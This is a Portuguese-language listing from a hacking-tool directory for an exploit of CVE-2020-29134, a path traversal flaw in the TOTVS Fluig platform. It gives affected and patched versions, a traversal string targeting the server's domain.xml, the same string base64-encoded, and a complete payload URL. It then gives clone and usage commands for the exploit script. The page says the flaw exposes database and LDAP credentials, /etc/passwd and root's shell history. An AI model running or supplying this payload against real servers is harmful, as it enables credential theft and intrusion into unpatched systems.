Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-29134 — Exploração do CVE-2020-29134 - Plataforma TOTVS Fluig - Path Traversal | Kitploit
Ferramentas/GitHubGitHub/ls4ss/cve-2020-29134
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubls4ss/cve-2020-29134

CVE-2020-29134

Exploração do CVE-2020-29134 - Plataforma TOTVS Fluig - Path Traversal

Ver Repositório
31há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Plataforma Totvs Fluig

root@kitploit:~
 Fluig é a plataforma de produtividade e colaboração que integra com o sistema ERP,
 e os outros sistemas da sua empresa para revolucionar a forma como você e sua equipe trabalham.

CVE-2020-29134

root@kitploit:~
 A plataforma TOTVS Fluig permite path traversal via parâmetro codificado em base64.
 Quando explorada, essa vulnerabilidade permite a leitura de arquivos XML sensíveis, que contêm
 dados para acessar o banco de dados e, em alguns casos, conexões LDAP e integrações com sistemas ERP.
 Além disso, também é possível explorar arquivos do sistema, como /etc/passwd e /root/.bash_history.
 

Versões afetadas

root@kitploit:~
--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...

Versões corrigidas

root@kitploit:~
<== Fluig Lake 1.7.0-210303 (Corrigida)
<== Fluig 1.6.5-210308 (Corrigida)
<== Fluig 1.6.4-210308 (Corrigida)

Construindo o Payload

alt text

Vetor de ataque

root@kitploit:~
 http://fluig.host.com/volume/stream/Rmx1aWc=/

Path traversal em texto plano

root@kitploit:~
 ?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml

Path traversal codificado em base64

root@kitploit:~
 P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=

Payload

root@kitploit:~
 http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
 

Referência Exploit-DB

root@kitploit:~
 https://www.exploit-db.com/exploits/49622

 

Clonar Repositório

root@kitploit:~
 # git clone https://github.com/lucxssouza/CVE-2020-29134.git
 # cd CVE-2020-29134
 # chmod +x xfluig.sh

Uso

root@kitploit:~
 Ex1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (número de requisições geradas pelo wfuzz)

 Ex2: ./xfluig.sh http://fluig.host.com:PORT
Baixar ferramenta